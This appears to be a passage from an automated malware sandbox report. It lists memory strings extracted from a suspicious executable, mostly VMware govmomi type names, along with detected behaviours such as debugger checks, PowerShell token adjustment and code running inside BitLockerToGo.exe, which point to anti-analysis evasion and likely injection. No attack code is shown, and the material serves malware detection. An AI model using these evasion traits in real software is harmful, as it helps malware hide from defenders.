            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*HostAccessRestrictedToManagementServerFault).GetNotSupported
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.LocalTSMEnabledEvent
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*DuplicateVsanNetworkInterface).GetMethodFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.HostCapabilityVmDirectPathGen2UnsupportedReason.Values
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VimFault).GetVimFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.ListGuestAliases
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.VirtualHardwareMotherboardLayout.Values
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*PowerOnFtSecondaryTimedout).GetMethodFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*CannotUseNetworkFault).GetVmConfigFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VirtualMachineFaultToleranceState).Values
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*CryptoSpecDeepRecrypt).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.AlarmState
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.CreateSnapshotRequestType
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*DigestNotSupportedFault).GetVirtualHardwareCompatibilityIssue
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*DiskMoveTypeNotSupportedFault).GetMigrationFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*ExitedStandbyModeEvent).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*OvfInternalError).GetVimFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.FormatVffsRequestType
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*CannotDisableSnapshot).GetVmConfigFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*SwapDatastoreNotWritableOnHostFault).GetVimFault
            Source: file.exe, 00000000.00000002.1511159649.000001DC8B8FE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.ProfileMetadataProfileSortSpec
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.VchaNodeRuntimeInfo
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*EVCModeIllegalByVendor).GetMethodFault
            Source: wab.exe, 00000004.00000003.1668118484.000000000889D000.00000004.00000020.00020000.00000000.sdmp, RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.0000000001C1A000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: #*[2]types.VirtualMachineCryptoState
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*HostOvercommittedEvent).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VmUuidAssignedEvent).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*HostVffsVolume).GetHostFileSystemVolume
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*InvalidIpfixConfigFault).GetMethodFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*UnSupportedDatastoreForVFlash).GetVimFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VmRenamedEvent).GetVmEvent
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*DiskIsUSB).GetVsanFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.QuarantineModeFaultFaultType.Values
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*ConcurrentAccessFault).GetVimFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*OvfConnectedDeviceIsoFault).GetVimFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*HostMountInfo).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*PolicyOption).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.0000000001C1A000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: *types.VMwareDvsMtuCapability
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*HostTpmNvTagEventDetails).GetHostTpmEventDetails
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*CannotReconfigureVsanWhenHaEnabled).GetVimFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VmRelocateFailedEvent).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*HostEnableAdminFailedEvent).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*InvalidVmState).GetMethodFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*AlarmScriptFailedEvent).GetAlarmEvent
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*OvfElementInvalidValue).GetOvfFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VFlashModuleNotSupported).GetVmConfigFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*HostOvercommittedEvent).GetClusterOvercommittedEvent
            Source: wab.exe, 00000004.00000003.1668118484.000000000889D000.00000004.00000020.00020000.00000000.sdmp, RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.0000000001C1A000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: &*[]types.VirtualMachineVgpuProfileInfo
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VmAlreadyExistsInDatacenterFault).GetMethodFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*ClusterProfileConfigServiceCreateSpec).GetClusterProfileCreateSpec
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*TooManyGuestLogonsFault).GetGuestOperationsFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*ToolsAlreadyUpgraded).GetMethodFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VsanUpgradeSystemMissingHostsInClusterIssue).GetVsanUpgradeSystemPreflightCheckIssue
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*HostGraphicsInfoGraphicsType).Values
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*InvalidProfileReferenceHostReason).Values
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.[4]github.com/vmware/govmomi/vim25/types.HostNumericSensorHealthState
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*CannotDisconnectHostWithFaultToleranceVmFault).GetVimFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*LargeRDMConversionNotSupportedFault).GetMigrationFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*HostMemberUplinkHealthCheckResult).GetDynamicData
            Source: wab.exe, 00000004.00000003.1668118484.000000000889D000.00000004.00000020.00020000.00000000.sdmp, RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.0000000001C1A000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: (VirtualMachineIdeDiskDevicePartitionInfoFxml:"VirtualMachineIdeDiskDevicePartitionInfo,omitempty" json:"_value"
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.ChangeLockdownMode
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.CreateProfileRequestType
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.ReplicationGroupId
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*ScheduledHardwareUpgradeInfoHardwareUpgradePolicy).Values
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.RemoveVirtualNicRequestType
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*RDMPointsToInaccessibleDisk).GetCannotAccessVmDisk
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.VirtualMachineSgxInfoFlcModes.Values
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*CannotMoveFaultToleranceVmMoveType).Strings
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*UnsharedSwapVMotionNotSupportedFault).GetVimFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.WeeklyTaskScheduler
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*DatastoreFileEvent).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*OvfPropertyExport).GetOvfExport
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*CreateTaskAction).GetAction
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VmMonitorIncompatibleForFaultToleranceFault).GetMethodFault
            Source: wab.exe, 00000004.00000003.1668118484.000000000889D000.00000004.00000020.00020000.00000000.sdmp, RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.0000000001C1A000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: &*types.ArrayOfVirtualMachineVcpuConfig&*[]types.VirtualMachineVgpuProfileInfo&*func() *types.VmfsDatastoreBaseOption
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*ProfileCompositePolicyOptionMetadata).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VirtualMachineNeedSecondaryReason).Strings
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.HostInternetScsiHbaDigestType.Values
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.ClusterDasConfigInfoVmMonitoringState.Strings
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*HostScsiTopology).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.[4]github.com/vmware/govmomi/vim25/types.HostInternetScsiHbaIscsiIpv6AddressAddressConfigurationType
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*EVCConfigFault).GetEVCConfigFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.UpdateIpmiRequestType
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*HostCnxFailedAccountFailedEvent).GetDynamicData
            Source: wab.exe, 00000004.00000003.1668118484.000000000889D000.00000004.00000020.00020000.00000000.sdmp, RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.0000000001C1A000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: *GetVirtualMachineBaseIndependentFilterSpec
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VirtualEnsoniq1371Option).GetVirtualDeviceOption
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*StorageDrsHmsUnreachable).GetMethodFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*InvalidDatastorePathFault).GetVimFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.VmGuestShutdownEvent
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*GuestRegistryFault).GetVimFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*ValidateMigrationTestType).Values
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.FindAllByDnsName
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*GhostDvsProxySwitchDetectedEvent).GetHostEvent
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*HostCnxFailedBadCcagentEvent).GetEvent
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*OvfPropertyQualifierIgnoredFault).GetOvfInvalidPackage
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*ClockSkewFault).GetVimFault
            Source: wab.exe, 00000004.00000003.1668118484.000000000889D000.00000004.00000020.00020000.00000000.sdmp, RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.0000000001C1A000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: MaxNumSmpFtVms*xml:"maxNumSmpFtVms" json:"maxNumSmpFtVms"9*[2]types.DVPortStatusVmDirectPathGen2InactiveReasonOther9*[3]types.ClusterHostInfraUpdateHaModeActionOperationType9*[3]types.HostCapabilityVmDirectPathGen2UnsupportedReason9*[3]types.InvalidDasConfigArgumentEntryForInvalidArgument9*[4]types.HostRuntimeInfoNetStackInstanceRuntimeInfoState9*[5]types.VirtualMachineVirtualDeviceSwapDeviceSwapStatus
            Source: wab.exe, 00000004.00000003.1668118484.000000000889D000.00000004.00000020.00020000.00000000.sdmp, RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.0000000001C1A000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: RightGui(xml:"rightGui" json:"rightGui,omitempty"1*[]types.VirtualMachineConfigInfoDatastoreUrlPair
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*OvfMissingElementNormalBoundary).GetOvfMissingElement
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VirtualVideoCardOption).GetVirtualDeviceOption
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*DvsIpNetworkRuleQualifier).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.RetrieveSnapshotInfo
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*ImportOperationBulkFault).GetMethodFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.ListFilesInGuestRequestType
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 19_2_0043F3F0 LdrInitializeThunk,19_2_0043F3F0
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE2D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00007FF6AAE2D12C
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE43480 GetProcessHeap,13_2_00007FF6AAE43480
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE2D30C SetUnhandledExceptionFilter,13_2_00007FF6AAE2D30C
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE2D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00007FF6AAE2D12C
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE2C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00007FF6AAE2C8A0
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE3A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00007FF6AAE3A614
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE2D30C SetUnhandledExceptionFilter,20_2_00007FF6AAE2D30C
